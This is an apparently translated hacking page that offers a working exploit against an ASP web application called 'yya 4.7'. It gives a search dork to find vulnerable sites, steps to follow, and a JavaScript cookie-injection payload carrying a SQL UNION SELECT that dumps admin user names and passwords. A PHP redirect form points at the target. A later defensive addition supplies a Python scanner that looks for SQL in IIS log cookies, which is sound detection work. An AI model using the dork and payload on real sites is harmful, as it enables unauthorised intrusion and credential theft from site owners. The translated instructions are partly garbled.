EXP:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>-hi.baidu.com/5427518-</title>
</head>
<style type="text/css">
<!--
.STYLE1 {font-size: 13px; font-family: Arial, Helvetica, sans-serif}
-->
</style>
<span class="STYLE1"> Xday removal in concave yya 4.7 and earlier versions <br> For study only; anyone who uses it to break the law does so at their own risk. <br> Note: <br>
0. Google: inurl:/otype.asp?Classid= <br>
1. Type the target site. If nothing unexpected happens, you will wait for a while. We recommend drinking tea while the script times out. <br>
2. Enter the code below in the address bar to perform the JavaScript hijack. <br>
3. Refresh once, right-click to view the source file, and the user name and password will pop up. <br>
4. If you are out of luck, clear the cookies and try again. <br>
5. If oyaya.asp is not available, the target site is likely running a version earlier than 4.7; the old version injects cookies directly. <br>
<font color="red">
Javascript: alert (document. cookie = "n =" + escape ("2 1 as id, 2 as title, admin & password as oStyle, 4, 5, 6, 7, 8, 9 from admin union all select top 1 "));
</font>
<form action="" method="post" enctype="multipart/form-data" class="STYLE1">
<br>
If you are ready, enter it! Example: www.hackqing.cn <br>
Target site: <input type="text" name="a"/>
<input type="submit" name="submit" value="submit"/> <br>
Backend backup and iis resolution.
</form> </span>
<span class="STYLE1">
<?php
// Redirect the browser to oyaya.asp on the host submitted in the form field "a".
if (!empty($_POST['a']))
{
    header("Location: http://" . $_POST['a'] . "/oyaya.asp");
}
?> </span>
Save the preceding code as an .htm or .html file.
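
Added example for defenders, not part of the original page: the steps above place a SQL fragment in the escape()-encoded cookie named n, so the same request leaves a recognizable trace in the web server log. This Python scan of IIS W3C logs flags any cookie whose decoded value looks like SQL; it assumes the optional cs(Cookie) log field is enabled, the function names are illustrative, and the sample log lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# SQL shapes that have no business inside a cookie value.
SQLI = re.compile(r"\bunion\b.{0,40}\bselect\b|\bselect\b.{1,200}\bfrom\b", re.I | re.S)

def parse_w3c(lines):
    """Yield one dict per request from IIS W3C extended log lines."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names follow the directive
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):     # skip truncated or malformed rows
                yield dict(zip(fields, values))

def cookies(raw):
    """Split a logged Cookie header into (name, decoded value) pairs."""
    if raw in ("", "-"):                       # "-" means the field was empty
        return
    for part in raw.split(";"):
        # IIS writes spaces as "+", so trim them before splitting name=value.
        name, sep, value = part.strip("+ ").partition("=")
        if sep:
            yield name, unquote_plus(value)    # undo %XX encoding from escape()

def find_cookie_sqli(lines):
    """Return (client_ip, uri, cookie_name, decoded_value) for suspicious cookies."""
    hits = []
    for req in parse_w3c(lines):
        for name, value in cookies(req.get("cs(Cookie)", "-")):
            if SQLI.search(value):
                hits.append((req.get("c-ip"), req.get("cs-uri-stem"), name, value))
    return hits

# Constructed sample log (documentation-range IPs), not captured traffic.
SAMPLE = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status cs(Cookie)
2009-05-01 10:00:01 192.0.2.10 GET /oyaya.asp 200 ASPSESSIONIDAB=XYZ;+n=7
2009-05-01 10:00:09 198.51.100.7 GET /oyaya.asp 200 n=2%20as%20title%20from%20admin%20union%20all%20select%20top%201
2009-05-01 10:00:12 192.0.2.11 GET /otype.asp 200 -
""".splitlines()

if __name__ == "__main__":
    for hit in find_cookie_sqli(SAMPLE):
        print(hit)
```

A hit on the n cookie is a signal to check whether the site reads that cookie into a query without validating it, and to review the admin table credentials for exposure.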